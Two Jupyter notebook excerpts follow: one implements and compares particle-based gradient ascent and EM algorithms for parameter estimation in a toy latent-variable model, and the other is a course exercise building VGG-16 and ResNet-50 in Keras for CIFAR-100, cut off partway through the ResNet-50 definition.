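$$\nabla_x \log p_\theta(x, y) = y + \theta - 2x, \qquad \nabla_\theta \log p_\theta(x, y) = \sum_{d=1}^D (x_d - \theta), \qquad \theta_{k+1}^{\mathrm{EM}} = \tfrac{1}{2}\big(\theta_k + \bar{y}\big).$$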
###Code
#@title Load modules.
import numpy as np # Numpy for computations.
import matplotlib.pyplot as plt # Pyplot for plots.
#@title Implement algorithms.
# Algorithms.
def pga(y, h, K, N, th, X):
"""Particle Gradient Ascent Algorithm. Returns parameter estimates."""
D = y.size # Extract dimension of latent variables.
for k in range(K):
# Update parameter estimate:
th = np.append(th, th[k] + h*ave_grad_th(th[k], X))
# Update particle cloud:
X = (X + h*grad_x(y, th[k], X)
+ np.sqrt(2*h)*np.random.normal(0, 1, (D, N)))
return th
def pqn(y, h, K, N, th, X):
"""Particle Quasi-Newton Algorithm. Returns parameter estimates."""
D = y.size # Extract dimension of latent variables.
for k in range(K):
# Update parameter estimate:
th = np.append(th, th[k]
+ h*(ave_neg_hess_th(D)**-1)*ave_grad_th(th[k], X))
# Update particle cloud:
X = (X + h*grad_x(y, th[k], X)
+ np.sqrt(2*h)*np.random.normal(0, 1, (D, N)))
return th
def pmga(y, h, K, N, X):
"""Particle Marginal Gradient Ascent Algorithm.
Returns parameter estimates.
"""
D = y.size # Extract dimension of latent variables.
th = np.array([theta_opt(X)]) # Compute initial parameter estimate.
for k in range(K):
# Update particle cloud:
X = (X + h*grad_x(y, th[k], X)
+ np.sqrt(2*h)*np.random.normal(0, 1, (D, N)))
th = np.append(th, theta_opt(X)) # Update parameter estimate.
return th
def em(y, K, th):
"""Expectation Maximization Algorithm. Returns parameter estimates."""
for k in range(K):
th = np.append(th, th[k]/2 + y.mean()/2) # Update parameter estimate.
return th
# Auxiliary functions.
def theta_opt(X):
return X.mean() # Return optimal parameter for particle cloud X.
def ave_grad_th(th, X):
"""Returns theta-gradient of log density averaged over particles."""
return X[:, 0].size*(theta_opt(X) - th)
def ave_neg_hess_th(D):
"""Returns negative-theta-Hessian of log density averaged over particles.
"""
return D
def grad_x(y, th, X):
"""Returns x-gradient of log density vectorized over particles."""
return (y + th - 2*X)
###Output
_____no_output_____
###Markdown
Next, we choose the model parameters and we generate synthetic data:
###Code
D = 100 # Dimensionality of latent variables.
thdata = 1 # Parameter value used to generate the data.
# Generate the data:
y = np.random.normal(0, 1, (D, 1)) + np.random.normal(thdata, 1, (D, 1))
###Output
_____no_output_____
###Markdown
Figure 1a We examine the impact that different step-sizes have on PGA's stability:
###Code
#Set approximation parameters:
K = 300 # Number of steps.
N = 10 # Number of particles.
th0 = np.array([0]) # Initial parameter guess.
X0 = np.zeros((D, N)) # Initial particle cloud.
# Run PGA using three different step-sizes:
th_large = pga(y, 2.05/(2+D), K, N, th0, X0) # Large step-size
th_optimal = pga(y, 2/(2+D), K, N, th0, X0) # Optimal step-size
th_small = pga(y, 0.75/(2+D), K, N, th0, X0) # Small step-size
# Plot parameter estimates as a function of step number k:
plt.plot(th_large, label='Large step-size')
plt.plot(th_optimal, label='Optimal step-size')
plt.plot(th_small, label='Small step-size')
plt.plot(y.mean()*np.ones(K), label='Optimal theta')
plt.legend(loc='lower right')
plt.ylim([0, 1.2*y.mean()])
plt.xlim([0, K])
###Output
_____no_output_____
###Markdown
Figure 1b,c We compare the performance of PGA, PQN, PMGA, and EM:
###Code
# Run the algorithms using the optimal step-sizes:
th_pga = pga(y, 2/(2+D), K, N, th0, X0)
th_pqn = pqn(y, 2/3, K, N, th0, X0)
th_pmga = pmga(y, 1, K, N, X0)
th_em = em(y, K, th0)
# Plot parameter estimates as a function of step number k:
plt.plot(th_pga, label='PGA')
plt.plot(th_pqn, label='PQN')
plt.plot(th_pmga, label='PMGA')
plt.plot(th_em, label='EM')
plt.plot(y.mean()*np.ones(K), label='Optimal theta')
plt.legend(loc='lower right')
plt.xlim([-K/100, K])
###Output
_____no_output_____
###Markdown
To extract converging estimates from PGA, PQN, and PMGA, we average over time (starting once the estimates reach stationarity). To this end, we use the following function that cumulatively averages all entries of a vector x past a threshold n:
###Code
#@title Cumulative mean.
def cmean(x, n):
"""Returns [x[0], ..., x[n-1], z[n], ..., z[K-1]], where N denotes x's size
and z[k] denotes the average of [x[n], ..., x[k]].
"""
if n == 0:
return np.cumsum(x[n:-1])/np.arange(1, x[n:-1].size + 1)
else:
return np.append(x[0:n-1],
np.cumsum(x[n:-1])/np.arange(1, x[n:-1].size + 1))
###Output
_____no_output_____
###Markdown
We then obtain the following:
###Code
plt.plot(cmean(th_pga, 150), label='PGA')
plt.plot(cmean(th_pqn, 15), label='PQN')
plt.plot(cmean(th_pmga, 5), label='PMGA')
plt.plot(th_em, label='EM')
plt.plot(y.mean()*np.ones(K), label='Optimal theta')
plt.legend(loc='lower right')
plt.xlim([-K/100, K])
###Output
_____no_output_____
###Markdown
Lastly, we zoom in to the first 30 time-steps to differentiate between the PQN, PMGA, and EM estimates:
###Code
plt.plot(cmean(th_pga, 150), label='PGA')
plt.plot(cmean(th_pqn, 15), label='PQN')
plt.plot(cmean(th_pmga, 5), label='PMGA')
plt.plot(th_em, label='EM')
plt.plot(y.mean()*np.ones(K), label='Optimal theta')
plt.legend(loc='lower right')
plt.xlim([-0.3, 30])
###Output
_____no_output_____
###Markdown
Figure 2 We investigate the asymptotic bias present in the variance of the posterior approximations produced by PMGA (time-averaged without burn-in). We focus on the uni-dimensional case (D=1) for which the bias is most pronounced. This requires generating new data:
###Code
D = 1 # Dimensionality of latent variables.
# Generate the data:
y = np.random.normal(0, 1, (D, 1)) + np.random.normal(thdata, 1, (D, 1))
###Output
_____no_output_____
###Markdown
Next, we tweak the PMGA code so that it returns (time-averaged without burn-in) variance estimates rather than parameter estimates:
###Code
#@title Tweaked PMGA
def pmga_v(y, h, K, N, X):
"""Particle Marginal Gradient Ascent Algorithm.
Returns posterior variance estimates.
"""
D = y.size # Extract dimension of latent variables.
th = np.array([theta_opt(X)]) # Compute initial parameter estimate.
# Initialize the vectors that will contain the first two moments of the
# current particle cloud (required to compute the variance estimates):
mu1 = np.reshape(X.mean(1), (D, 1)) # First moment.
mu2 = np.reshape((X ** 2).mean(1), (D, 1)) # Second moment.
for k in range(K):
# Update particle cloud:
X = (X + h*grad_x(y, th[k], X)
+ np.sqrt(2*h)*np.random.normal(0, 1, (D, N)))
th = np.append(th, theta_opt(X)) # Update parameter estimate.
# Store moments:
mu1 = np.append(mu1, np.reshape(X.mean(1), (D, 1)), axis=1)
mu2 = np.append(mu2, np.reshape((X ** 2).mean(1), (D, 1)), axis=1)
# Compute time-averaged variance estimates as a function of k:
var = (np.cumsum(mu2)/np.arange(1, K + 2)
- (np.cumsum(mu1)/np.arange(1, K + 2)) ** 2)
return var
###Output
_____no_output_____
###Markdown
Figure 2a In our first plot, we examine the dependence of the bias on the particle number. To this end, we fix a small step-size and large step number. In short, the larger the particle number, the smaller the bias:
###Code
K = 20000 # Number of steps.
h = 0.015 # Step-size.
# Compute variance estimates:
var1 = pmga_v(y, h, K, 1, np.zeros((D, 1))) # Using 1 particle.
var2 = pmga_v(y, h, K, 2, np.zeros((D, 2))) # Using 2 particles.
var4 = pmga_v(y, h, K, 4, np.zeros((D, 4))) # Using 4 particles.
var50 = pmga_v(y, h, K, 50, np.zeros((D, 50))) # Using 50 particles.
var100 = pmga_v(y, h, K, 100, np.zeros((D, 100))) # Using 100 particles.
# Plot estimates:
plt.plot(var1, label='N = 1')
plt.plot(var2, label='N = 2')
plt.plot(var4, label='N = 4')
plt.plot(var50, label='N = 50')
plt.plot(var100, label='N = 100')
plt.plot(0.5*np.ones(K), label='Optimal variance')
plt.legend(loc='lower right', ncol=2)
plt.xlim([-K/100, K])
###Output
_____no_output_____
###Markdown
Figure 2b Next, we examine how the bias depends on the step-size. To do so, we fix large particle and step numbers. This time, the smaller the step-size, the smaller the bias:
###Code
N = 100 # Number of particles.
X0 = np.zeros((D, N)) # Initial particle cloud (with amended dimension).
# Compute variance estimates:
var05 = pmga_v(y, 1/2, K, N, X0) # Using a step-size of 1/2.
var025 = pmga_v(y, 1/4, K, N, X0) # Using a step-size of 1/4.
var0125 = pmga_v(y, 1/8, K, N, X0) # Using a step-size of 1/8.
var003 = pmga_v(y, 0.03, K, N, X0) # Using a step-size of 0.03.
var0015 = pmga_v(y, 0.015, K, N, X0) # Using a step-size of 0.015.
# Plot estimates:
plt.plot(var05, label='h = 1/2')
plt.plot(var025, label='h = 1/4')
plt.plot(var0125, label='h = 1/8')
plt.plot(var003, label='h = 0.03')
plt.plot(var0015, label='h = 0.015')
plt.plot(0.5*np.ones(K), label='Optimal variance')
plt.legend(loc='lower right', ncol=2)
plt.xlim([-K/100, K])
###Output
_____no_output_____
###Markdown
Figure 2c We can remove the bias stemming from the discretization of the time-axis by adding a population-wide accept-reject step. In other words, by running the following Metropolized version of PMGA:
###Code
#@title Metropolized PMGA (Algorithm 1 in Appendix I).
def pmga_mh(y, h, K, N, X):
"""Metropolized Particle Marginal Gradient Ascent Algorithm.
Returns posterior variance estimates.
"""
D = y.size # Extract dimension of latent variables.
th = np.array([theta_opt(X)]) # Compute initial parameter estimate.
# Initialize vectors containing the first two moments of the current
# particle cloud (required to compute the variance estimates):
mu1 = np.reshape(X.mean(1), (D, 1)) # First moment.
mu2 = np.reshape((X ** 2).mean(1), (D, 1)) # Second moment.
for k in range(K):
# Propose a new particle cloud:
Z = (X + h*grad_x(y, theta_opt(X), X)
+ np.sqrt(2*h)*np.random.normal(0, 1, (D, N)))
# Accept-reject step:
if np.random.uniform(0, 1, 1) < accept(X, Z, y, h, N):
X = Z
th = np.append(th, theta_opt(X)) # Update parameter estimate.
# Store moments:
mu1 = np.append(mu1, np.reshape(X.mean(1), (D, 1)), axis=1)
mu2 = np.append(mu2, np.reshape((X ** 2).mean(1), (D, 1)), axis=1)
# Compute time-averaged variance estimates as a function of k:
var = (np.cumsum(mu2, axis=1)/np.arange(1, K + 2)
- (np.cumsum(mu1, axis=1)/np.arange(1, K + 2))**2)
return var # Returns the coordinate-wise variances as a function of k.
def accept(X, Z, y, h, N):
"""Computes acceptance probability for proposed moved X -> Z."""
thx = theta_opt(X)
thz = theta_opt(Z)
s = 1
for n in range(N):
x = X[:, [n]]
z = Z[:, [n]]
tempx = ((y - x).T@(y - x)/2 + (x - thx).T@(x - thx)/2
+ (z - x - h*(y + thx - 2*x)).T
@ (z - x - h*(y + thx - 2*x))/(4*h))
tempz = ((y - z).T@(y - z)/2 + (z - thz).T@(z - thz)/2
+ (x - z - h*(y + thz - 2*z)).T
@ (x - z - h*(y + thz - 2*z))/(4*h))
s = s*np.exp(tempx - tempz)
return np.minimum(1, s)
###Output
_____no_output_____
###Markdown
Regardless of the step-size h that we use, only bias stemming from the finite particle number N remains. However, for large particle numbers, we are forced to reduce the step-size to stop the acceptance probability from degenerating.
###Code
K = 10000 # Number of steps.
# Compute estimates:
var1 = pmga_mh(y, 1/2, K, 1, np.zeros((D, 1))) # h = 1/2 and N = 1.
var2 = pmga_mh(y, 1/2, K, 2, np.zeros((D, 2))) # h = 1/2 and N = 2.
var4 = pmga_mh(y, 1/2, K, 4, np.zeros((D, 4))) # h = 1/2 and N = 4.
var50 = pmga_mh(y, 1/4, K, 50, np.zeros((D, 50))) # h = 1/4 and N = 50.
# Plot estimates:
plt.plot(var1[0, :], label='N = 1')
plt.plot(var2[0, :], label='N = 2')
plt.plot(var4[0, :], label='N = 4')
plt.plot(var50[0, :], label='N = 50')
plt.plot(0.5*np.ones(K), label='Optimal variance')
plt.legend(loc='lower right', ncol=2)
plt.xlim([-K/100, K])
plt.ylim([0, 1.2*var1[0, -1]])
###Output
_____no_output_____ |
FUNDAMENTALS/Node_22/[F-22] Only_LMS_Code_Blocks.ipynb | ###Markdown
22. Deep Networks: What Makes Them Different?**We cover the key concepts of Convolutional Neural Networks, which are widely used in computer vision, and popular network architectures such as VGG and ResNet.** 22-1. Introduction 22-2. ImageNet Challenge 22-3. The Beginning of Deep Networks 22-4. Using CNNs Well 22-5. It's Hard to Hear from Far Away 22-6. Let's Make a Shortcut 22-7. Deep Networks Inside and Out 22-8. Model API 22-9. VGG-16
###Code
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
# Let's load the CIFAR100 dataset.
cifar100 = keras.datasets.cifar100
(x_train, y_train), (x_test, y_test) = cifar100.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
print("x_train:", len(x_train), "x_test:", len(x_test))
img_input = keras.Input(shape=(32, 32, 3))
x = keras.layers.Conv2D(16, 3, activation='relu')(img_input)
x = keras.layers.MaxPool2D((2,2))(x)
x = keras.layers.Conv2D(32, 3, activation='relu')(x)
x = keras.layers.MaxPool2D((2,2))(x)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(256, activation='relu')(x)
predictions = keras.layers.Dense(100, activation='softmax')(x)
model = keras.Model(inputs=img_input, outputs=predictions)
model.summary()
# Train the model!!
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(x_train, y_train, epochs=1) # Train for just 1 epoch.
# First block (example)
x = layers.Conv2D(64, (3, 3),
activation='relu',
padding='same',
name='block1_conv1')(img_input)
x = layers.Conv2D(64, (3, 3),
activation='relu',
padding='same',
name='block1_conv2')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)
print('First block OK!!')
# Second block
# [[YOUR CODE]]
x = layers.Conv2D(
128, (3, 3), activation='relu', padding='same', name='block2conv1')(x)
x = layers.Conv2D(
128, (3, 3), activation='relu', padding='same', name='block2conv2')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
print('Second block OK!!')
###Output
_____no_output_____
###Markdown
```python
# Answer code: second block
x = layers.Conv2D(
    128, (3, 3), activation='relu', padding='same', name='block2conv1')(x)
x = layers.Conv2D(
    128, (3, 3), activation='relu', padding='same', name='block2conv2')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
```
###Code
# Third block
# [[YOUR CODE]]
# Block 3
x = layers.Conv2D(256, (3, 3),
activation='relu',
padding='same',
name='block3_conv1')(x)
x = layers.Conv2D(256, (3, 3),
activation='relu',
padding='same',
name='block3_conv2')(x)
x = layers.Conv2D(256, (3, 3),
activation='relu',
padding='same',
name='block3_conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)
print('Third block OK!!')
###Output
_____no_output_____
###Markdown
```python
# Answer code: third block
x = layers.Conv2D(
    256, (3, 3), activation='relu', padding='same', name='block3conv1')(x)
x = layers.Conv2D(
    256, (3, 3), activation='relu', padding='same', name='block3conv2')(x)
x = layers.Conv2D(
    256, (3, 3), activation='relu', padding='same', name='block3conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block3pool')(x)
```
###Code
# Fourth block
# [[YOUR CODE]]
x = layers.Conv2D(
512, (3, 3), activation='relu', padding='same', name='block4conv1')(x)
x = layers.Conv2D(
512, (3, 3), activation='relu', padding='same', name='block4conv2')(x)
x = layers.Conv2D(
512, (3, 3), activation='relu', padding='same', name='block4conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block4pool')(x)
print('Fourth block OK!!')
###Output
_____no_output_____
###Markdown
```python
# Answer code: fourth block
x = layers.Conv2D(
    512, (3, 3), activation='relu', padding='same', name='block4conv1')(x)
x = layers.Conv2D(
    512, (3, 3), activation='relu', padding='same', name='block4conv2')(x)
x = layers.Conv2D(
    512, (3, 3), activation='relu', padding='same', name='block4conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block4pool')(x)
```
###Code
# Fifth block
# [[YOUR CODE]]
# Block 5
x = layers.Conv2D(512, (3, 3),
activation='relu',
padding='same',
name='block5_conv1')(x)
x = layers.Conv2D(512, (3, 3),
activation='relu',
padding='same',
name='block5_conv2')(x)
x = layers.Conv2D(512, (3, 3),
activation='relu',
padding='same',
name='block5_conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)
print('Fifth block OK!!')
###Output
_____no_output_____
###Markdown
```python
# Answer code: fifth block
x = layers.Conv2D(
    512, (3, 3), activation='relu', padding='same', name='block5conv1')(x)
x = layers.Conv2D(
    512, (3, 3), activation='relu', padding='same', name='block5conv2')(x)
x = layers.Conv2D(
    512, (3, 3), activation='relu', padding='same', name='block5conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block5pool')(x)
```
###Code
# Sixth block
# Look closely at the `if include_top:` part of the [Keras VGG16 code implementation] link
# [[YOUR CODE]]
print('Sixth block OK!!')
# Classification block
x = layers.Flatten(name='flatten')(x)
x = layers.Dense(4096, activation='relu', name='fc1')(x)
x = layers.Dense(4096, activation='relu', name='fc2')(x)
classes=100
x = layers.Dense(classes, activation='softmax', name='predictions')(x) # Model output for CIFAR100
###Output
_____no_output_____
###Markdown
```python
# Answer code: sixth block
x = layers.Flatten(name='flatten')(x)
x = layers.Dense(4096, activation='relu', name='fc1')(x)
x = layers.Dense(4096, activation='relu', name='fc2')(x)
classes = 100
x = layers.Dense(classes, activation='softmax', name='predictions')(x)  # Model output for CIFAR100
```
Phew, good work!
###Code
model = keras.Model(name="VGG-16", inputs=img_input, outputs=x)
model.summary()
# Train the model!!
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(x_train, y_train, epochs=1) # Train for just 1 epoch.
###Output
_____no_output_____
###Markdown
22-10. ResNet-50
###Code
# First import the additional packages we need.
from tensorflow.keras import backend, regularizers, initializers, models
# Declare the L2 regularizer that is used repeatedly inside the blocks.
def _gen_l2_regularizer(use_l2_regularizer=True, l2_weight_decay=1e-4):
return regularizers.l2(l2_weight_decay) if use_l2_regularizer else None
print('Resnet50 GoGo!!')
def conv_block(input_tensor,
kernel_size,
filters,
stage,
block,
strides=(2, 2),
use_l2_regularizer=True,
batch_norm_decay=0.9,
batch_norm_epsilon=1e-5):
# [[YOUR CODE]]
"""A block that has a conv layer at shortcut.
Note that from stage 3,
the second conv layer at main path is with strides=(2, 2)
And the shortcut should have strides=(2, 2) as well
Args:
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
strides: Strides for the second conv layer in the block.
use_l2_regularizer: whether to use L2 regularizer on Conv layer.
    batch_norm_decay: Momentum of batch norm layers.
    batch_norm_epsilon: Epsilon of batch norm layers.
Returns:
Output tensor for the block.
"""
filters1, filters2, filters3 = filters
if backend.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = layers.Conv2D(
filters1, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2a')(
input_tensor)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2a')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters2,
kernel_size,
strides=strides,
padding='same',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2b')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2b')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters3, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2c')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2c')(
x)
shortcut = layers.Conv2D(
filters3, (1, 1),
strides=strides,
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '1')(
input_tensor)
shortcut = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '1')(
shortcut)
x = layers.add([x, shortcut])
x = layers.Activation('relu')(x)
return x
###Output
_____no_output_____
###Markdown
```python
# Answer code
def conv_block(input_tensor,
               kernel_size,
               filters,
               stage,
               block,
               strides=(2, 2),
               use_l2_regularizer=True,
               batch_norm_decay=0.9,
               batch_norm_epsilon=1e-5):
  """A block that has a conv layer at shortcut.

  Note that from stage 3, the second conv layer at main path is with
  strides=(2, 2), and the shortcut should have strides=(2, 2) as well.

  Args:
    input_tensor: input tensor
    kernel_size: default 3, the kernel size of middle conv layer at main path
    filters: list of integers, the filters of 3 conv layer at main path
    stage: integer, current stage label, used for generating layer names
    block: 'a','b'..., current block label, used for generating layer names
    strides: Strides for the second conv layer in the block.
    use_l2_regularizer: whether to use L2 regularizer on Conv layer.
    batch_norm_decay: Momentum of batch norm layers.
    batch_norm_epsilon: Epsilon of batch norm layers.

  Returns:
    Output tensor for the block.
  """
  filters1, filters2, filters3 = filters
  if backend.image_data_format() == 'channels_last':
    bn_axis = 3
  else:
    bn_axis = 1
  conv_name_base = 'res' + str(stage) + block + '_branch'
  bn_name_base = 'bn' + str(stage) + block + '_branch'

  x = layers.Conv2D(
      filters1, (1, 1),
      use_bias=False,
      kernel_initializer='he_normal',
      kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
      name=conv_name_base + '2a')(input_tensor)
  x = layers.BatchNormalization(
      axis=bn_axis,
      momentum=batch_norm_decay,
      epsilon=batch_norm_epsilon,
      name=bn_name_base + '2a')(x)
  x = layers.Activation('relu')(x)

  x = layers.Conv2D(
      filters2,
      kernel_size,
      strides=strides,
      padding='same',
      use_bias=False,
      kernel_initializer='he_normal',
      kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
      name=conv_name_base + '2b')(x)
  x = layers.BatchNormalization(
      axis=bn_axis,
      momentum=batch_norm_decay,
      epsilon=batch_norm_epsilon,
      name=bn_name_base + '2b')(x)
  x = layers.Activation('relu')(x)

  x = layers.Conv2D(
      filters3, (1, 1),
      use_bias=False,
      kernel_initializer='he_normal',
      kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
      name=conv_name_base + '2c')(x)
  x = layers.BatchNormalization(
      axis=bn_axis,
      momentum=batch_norm_decay,
      epsilon=batch_norm_epsilon,
      name=bn_name_base + '2c')(x)

  shortcut = layers.Conv2D(
      filters3, (1, 1),
      strides=strides,
      use_bias=False,
      kernel_initializer='he_normal',
      kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
      name=conv_name_base + '1')(input_tensor)
  shortcut = layers.BatchNormalization(
      axis=bn_axis,
      momentum=batch_norm_decay,
      epsilon=batch_norm_epsilon,
      name=bn_name_base + '1')(shortcut)

  x = layers.add([x, shortcut])
  x = layers.Activation('relu')(x)
  return x
```
###Code
def identity_block(input_tensor,
kernel_size,
filters,
stage,
block,
use_l2_regularizer=True,
batch_norm_decay=0.9,
batch_norm_epsilon=1e-5):
# [[YOUR CODE]]
"""The identity block is the block that has no conv layer at shortcut.
Args:
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_l2_regularizer: whether to use L2 regularizer on Conv layer.
    batch_norm_decay: Momentum of batch norm layers.
    batch_norm_epsilon: Epsilon of batch norm layers.
Returns:
Output tensor for the block.
"""
filters1, filters2, filters3 = filters
if backend.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = layers.Conv2D(
filters1, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2a')(
input_tensor)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2a')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters2,
kernel_size,
padding='same',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2b')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2b')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters3, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2c')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2c')(
x)
x = layers.add([x, input_tensor])
x = layers.Activation('relu')(x)
return x
###Output
_____no_output_____
###Markdown
```python
# Answer code
def identity_block(input_tensor,
                   kernel_size,
                   filters,
                   stage,
                   block,
                   use_l2_regularizer=True,
                   batch_norm_decay=0.9,
                   batch_norm_epsilon=1e-5):
  """The identity block is the block that has no conv layer at shortcut.

  Args:
    input_tensor: input tensor
    kernel_size: default 3, the kernel size of middle conv layer at main path
    filters: list of integers, the filters of 3 conv layer at main path
    stage: integer, current stage label, used for generating layer names
    block: 'a','b'..., current block label, used for generating layer names
    use_l2_regularizer: whether to use L2 regularizer on Conv layer.
    batch_norm_decay: Momentum of batch norm layers.
    batch_norm_epsilon: Epsilon of batch norm layers.

  Returns:
    Output tensor for the block.
  """
  filters1, filters2, filters3 = filters
  if backend.image_data_format() == 'channels_last':
    bn_axis = 3
  else:
    bn_axis = 1
  conv_name_base = 'res' + str(stage) + block + '_branch'
  bn_name_base = 'bn' + str(stage) + block + '_branch'

  x = layers.Conv2D(
      filters1, (1, 1),
      use_bias=False,
      kernel_initializer='he_normal',
      kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
      name=conv_name_base + '2a')(input_tensor)
  x = layers.BatchNormalization(
      axis=bn_axis,
      momentum=batch_norm_decay,
      epsilon=batch_norm_epsilon,
      name=bn_name_base + '2a')(x)
  x = layers.Activation('relu')(x)

  x = layers.Conv2D(
      filters2,
      kernel_size,
      padding='same',
      use_bias=False,
      kernel_initializer='he_normal',
      kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
      name=conv_name_base + '2b')(x)
  x = layers.BatchNormalization(
      axis=bn_axis,
      momentum=batch_norm_decay,
      epsilon=batch_norm_epsilon,
      name=bn_name_base + '2b')(x)
  x = layers.Activation('relu')(x)

  x = layers.Conv2D(
      filters3, (1, 1),
      use_bias=False,
      kernel_initializer='he_normal',
      kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
      name=conv_name_base + '2c')(x)
  x = layers.BatchNormalization(
      axis=bn_axis,
      momentum=batch_norm_decay,
      epsilon=batch_norm_epsilon,
      name=bn_name_base + '2c')(x)

  x = layers.add([x, input_tensor])
  x = layers.Activation('relu')(x)
  return x
```
###Code
def resnet50(num_classes,
batch_size=None,
use_l2_regularizer=True,
rescale_inputs=False,
batch_norm_decay=0.9,
batch_norm_epsilon=1e-5):
# [[YOUR CODE]]
"""Instantiates the ResNet50 architecture.
Args:
num_classes: `int` number of classes for image classification.
batch_size: Size of the batches for each step.
use_l2_regularizer: whether to use L2 regularizer on Conv/Dense layer.
rescale_inputs: whether to rescale inputs from 0 to 1.
batch_norm_decay: Momentum of the batch norm layers.
batch_norm_epsilon: Epsilon of the batch norm layers.
Returns:
A Keras model instance.
"""
input_shape = (32, 32, 3)  # input_shape adjusted for CIFAR-100
img_input = layers.Input(shape=input_shape, batch_size=batch_size)
if rescale_inputs:
# Hub image modules expect inputs in the range [0, 1]. This rescales these
# inputs to the range expected by the trained model.
x = layers.Lambda(
lambda x: x * 255.0 - backend.constant(
imagenet_preprocessing.CHANNEL_MEANS,
shape=[1, 1, 3],
dtype=x.dtype),
name='rescale')(
img_input)
else:
x = img_input
if backend.image_data_format() == 'channels_first':
x = layers.Permute((3, 1, 2))(x)
bn_axis = 1
else: # channels_last
bn_axis = 3
block_config = dict(
use_l2_regularizer=use_l2_regularizer,
batch_norm_decay=batch_norm_decay,
batch_norm_epsilon=batch_norm_epsilon)
x = layers.ZeroPadding2D(padding=(3, 3), name='conv1_pad')(x)
x = layers.Conv2D(
64, (7, 7),
strides=(2, 2),
padding='valid',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='conv1')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name='bn_conv1')(
x)
x = layers.Activation('relu')(x)
x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x)
x = conv_block(
x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), **block_config)
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', **block_config)
x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', **block_config)
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', **block_config)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', **block_config)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', **block_config)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', **block_config)
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', **block_config)
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b', **block_config)
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c', **block_config)
